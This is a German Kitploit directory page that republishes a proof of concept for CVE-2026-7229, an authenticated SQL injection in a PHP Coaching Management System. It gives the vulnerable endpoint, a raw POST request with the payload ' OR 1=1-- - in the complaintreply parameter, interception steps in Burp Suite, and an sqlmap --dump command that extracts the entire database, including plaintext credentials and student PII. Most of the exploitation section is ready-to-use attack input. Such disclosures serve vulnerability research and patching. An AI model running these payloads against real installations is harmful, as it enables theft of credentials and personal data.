Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-7229-SQLI — Proof of Concept für authentifizierte SQL-Injection im Coaching Management System, das den Datenbank-Dump über den nicht bereinigten `complaintreply`-Parameter demonstriert. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-7229-sqli
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsDatenbanksicherheit
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

Proof of Concept für authentifizierte SQL-Injection im Coaching Management System, das den Datenbank-Dump über den nicht bereinigten `complaintreply`-Parameter demonstriert.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Authentifizierte SQL-Injection im Coaching Management System ermöglicht Datenbank-Dump

Beschreibung

Eine SQL-Injection-Schwachstelle besteht im Coaching Management System in PHP. Der Parameter complaintreply in der Admin-Antwortfunktion wird nicht ordnungsgemäß bereinigt, bevor er in SQL-Abfragen verwendet wird. Ein authentifizierter Angreifer (Admin) kann bösartige SQL-Abfragen injizieren, was zur vollständigen Extraktion der Datenbank führt.


Schwachstellendetails

  • Typ: SQL-Injection (CWE-89: Unzureichende Neutralisierung spezieller Elemente, die in einem SQL-Befehl verwendet werden)
  • Auswirkung: Datenbank-Dump / Offenlegung von Anmeldedaten
  • Betroffene Datei: /cims/modules/admin/reply.php
  • Betroffener Parameter: complaintreply
  • Angriffsvektor: Remote, authentifiziert (Admin)
  • Datenbank: MySQL (MariaDB)

Anbieter

code-projects.org


Produkt

Coaching Management System in PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/


Version

Unbekannt (Getestet mit der neuesten verfügbaren Version Stand April 2026)


Proof of Concept (Zusammenfassung)

  1. Student reicht Beschwerde ein Screenshot 2026-04-10 225755

  2. Admin öffnet die Beschwerde und greift auf die Antwortfunktion zu

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. Abfangen der Anfrage über Burp Suite Screenshot 2026-04-10 225821

  2. Payload injizieren:

    root@kitploit:~
    '
    
Screenshot 2026-04-10 225844
root@kitploit:~
SQL-Fehler beobachtet

7. Injection bestätigen:

root@kitploit:~
' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. Datenbank mit folgendem Befehl auslesen:

    root@kitploit:~
    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

Injection bestätigt über fehlerbasierte, boolesche und automatisierte Ausnutzung mit sqlmap

Auswirkung

  • Vollständige Extraktion der Datenbank möglich
  • Im Klartext gespeicherte Anmeldedaten offengelegt
  • Vollständige Kompromittierung der Anwendungsdaten
  • Umgehung der Authentifizierung und Privilegieneskalation durch Extraktion von Anmeldedaten
  • Vollständiger Datenbank-Dump erreicht, einschließlich Benutzertabelle (Anmeldedaten), Schüler-PII, Lehrerdatensätze und Beschwerdeverlauf.

Schweregrad: KRITISCH

Tool herunterladen